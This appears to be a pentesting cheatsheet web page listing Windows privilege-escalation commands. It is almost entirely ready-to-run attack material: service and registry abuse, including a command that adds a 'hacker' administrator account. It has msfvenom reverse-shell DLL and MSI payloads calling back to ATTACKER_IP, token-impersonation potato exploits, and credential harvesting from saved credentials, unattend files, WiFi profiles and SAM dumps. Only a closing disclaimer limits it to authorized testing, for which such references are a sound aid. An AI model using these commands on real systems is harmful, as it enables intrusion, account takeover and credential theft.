Quick Reference
Intermediate

Windows PrivEsc Cheatsheet

Essential commands for escalating privileges on Windows systems.

Quick Reference

Replace TARGET, USER, PASS with your actual values. Commands assume you have initial access.

System Enumeration

enum-system.cmd
cmd 
# System info
systeminfo
hostname
whoami /all
whoami /priv

# OS version and patches
wmic os get Caption,Version,BuildNumber
wmic qfe get Caption,Description,HotFixID,InstalledOn

# Network info
ipconfig /all
route print
netstat -ano
arp -a

# Users and groups
net user
net localgroup
net localgroup Administrators
query user

Automated Tools

WinPEAS

winpeas.cmd
cmd 
# Download and run
curl -o winpeas.exe https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe
winpeas.exe

# Specific checks
winpeas.exe quiet servicesinfo
winpeas.exe quiet applicationsinfo
winpeas.exe quiet userinfo

# Output to file
winpeas.exe log=output.txt

PowerUp

powerup.ps1
powershell 
# Import PowerUp
. .\PowerUp.ps1
Import-Module .\PowerUp.ps1

# Run all checks
Invoke-AllChecks

# Specific checks
Get-ServiceUnquoted
Get-ModifiableServiceFile
Get-ModifiableService
Find-ProcessDLLHijack

Service Exploits

Unquoted Service Path

unquoted-path.cmd
cmd 
# Find unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i /v "c:\windows" | findstr /i /v """

# PowerShell
Get-WmiObject win32_service | Select-Object Name, PathName | Where-Object {$_.PathName -notlike '*"*' -and $_.PathName -like '* *'}

# If path is: C:\Program Files\Vuln App\service.exe
# Write malicious exe to:
# C:\Program.exe or C:\Program Files\Vuln.exe

# Restart service
sc stop VulnService
sc start VulnService

Weak Service Permissions

weak-service.cmd
cmd 
# Check service permissions with accesschk
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula
accesschk.exe -uwcqv "Authenticated Users" * /accepteula

# Modify service binary path
sc config VulnService binpath= "C:\temp\shell.exe"
sc config VulnService binpath= "net user hacker P@ssw0rd /add && net localgroup Administrators hacker /add"

# Restart service
net stop VulnService
net start VulnService

# Check service permissions in registry
Get-Acl -Path HKLM:\System\CurrentControlSet\Services\VulnService | Format-List

DLL Hijacking

dll-hijack.cmd
cmd 
# Find missing DLLs (run as admin to monitor all services)
# Use Process Monitor - filter: Result = NAME NOT FOUND, Path ends with .dll

# Common DLL search order:
# 1. Directory of executable
# 2. C:\Windows\System32
# 3. C:\Windows\System
# 4. C:\Windows
# 5. Current directory
# 6. Directories in PATH

# Writable directories to exploit
icacls "C:\Program Files\VulnApp"
icacls "C:\Program Files (x86)\VulnApp"

# Generate malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f dll -o hijack.dll

Registry Exploits

registry.cmd
cmd 
# AlwaysInstallElevated (both must be set)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If enabled, create malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f msi -o shell.msi

# Install MSI as SYSTEM
msiexec /quiet /qn /i shell.msi

# AutoRun - Check for writable autoruns
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

# Check write permissions on autorun binaries
accesschk.exe -wvu "C:\Path\To\AutorunApp.exe"

Scheduled Tasks

scheduled-tasks.cmd
cmd 
# List scheduled tasks
schtasks /query /fo LIST /v
schtasks /query /fo TABLE

# Get task details
schtasks /query /tn "TaskName" /fo LIST /v

# Find tasks running as SYSTEM
schtasks /query /fo LIST /v | findstr /i "TaskName" | findstr /i "Run As User" | findstr /i "SYSTEM"

# Check permissions on task binaries
icacls "C:\Path\To\Task\Binary.exe"
accesschk.exe -wvu "C:\Path\To\Task\Binary.exe"

# If writable, replace with payload
copy C:\temp\shell.exe "C:\Path\To\Task\Binary.exe" /y

Token Impersonation

Potato Attacks

potato.cmd
cmd 
# Check if SeImpersonatePrivilege is enabled
whoami /priv

# JuicyPotato (Windows 7-10, Server 2008-2016)
JuicyPotato.exe -l 1337 -p c:\temp\shell.exe -t *

# PrintSpoofer (Windows 10, Server 2016-2019)
PrintSpoofer.exe -i -c "cmd /c c:\temp\shell.exe"

# GodPotato (Universal)
GodPotato.exe -cmd "cmd /c c:\temp\shell.exe"

# SweetPotato
SweetPotato.exe -e EfsRpc -p c:\temp\shell.exe

Incognito

incognito.sh
bash 
# Meterpreter
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
impersonate_token "DOMAIN\Administrator"

# Standalone incognito.exe
incognito.exe list_tokens -u
incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe

# Check for available tokens
whoami /priv | findstr SeImpersonate
whoami /priv | findstr SeAssignPrimaryToken

Credential Harvesting

credentials.cmd
cmd 
# Saved credentials
cmdkey /list
runas /savecred /user:DOMAIN\admin cmd

# Unattend files
dir /s *unattend.xml 2>nul
dir /s *sysprep.xml 2>nul
dir /s *sysprep.inf 2>nul

# Common locations
type C:\unattend.xml
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattend\Unattend.xml
type C:\Windows\system32\sysprep.inf
type C:\Windows\system32\sysprep\sysprep.xml

# Group Policy Preferences (cpassword)
dir /s Groups.xml 2>nul
findstr /si cpassword *.xml

# WiFi passwords
netsh wlan show profiles
netsh wlan show profile name="ProfileName" key=clear

# SAM/SYSTEM (if readable)
reg save HKLM\SAM sam
reg save HKLM\SYSTEM system
secretsdump.py -sam sam -system system LOCAL

Kernel Exploits

kernel.cmd
cmd 
# Check Windows version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic os get Caption,Version,BuildNumber

# Get hotfixes
wmic qfe get Caption,Description,HotFixID,InstalledOn

# Windows Exploit Suggester
python windows-exploit-suggester.py --database 2024-01-01-mssb.xls --systeminfo sysinfo.txt

# Common exploits by version
# Windows 7/2008 R2: MS16-032, MS15-051, MS14-058
# Windows 8/2012: MS16-032, MS15-051
# Windows 10/2016: Various potato exploits

# MS16-032 Secondary Logon Handle
Invoke-MS16032.ps1

# Check Exploit-DB and searchsploit
searchsploit windows kernel privilege escalation

Quick Reference

Technique Check Command Required Privilege
Unquoted Path wmic service get pathname Write to path directory
Weak Service accesschk.exe -uwcqv Users * Modify service config
AlwaysInstallElevated reg query HKLM\...\Installer Any user
Token Impersonation whoami /priv SeImpersonate
Saved Creds cmdkey /list Any user
Kernel Exploit systeminfo Varies

⚠️ Legal Disclaimer

Privilege escalation techniques are for authorized testing only. Always have written permission before attempting to escalate privileges on any system.

Related Topics

AD Attack Paths

Active Directory privilege escalation and lateral movement.

Internal Pentest

Complete internal network assessment methodology.

Binary Exploitation

Low-level exploitation techniques.

PowerShell Cheatsheet

PowerShell commands for pentesting.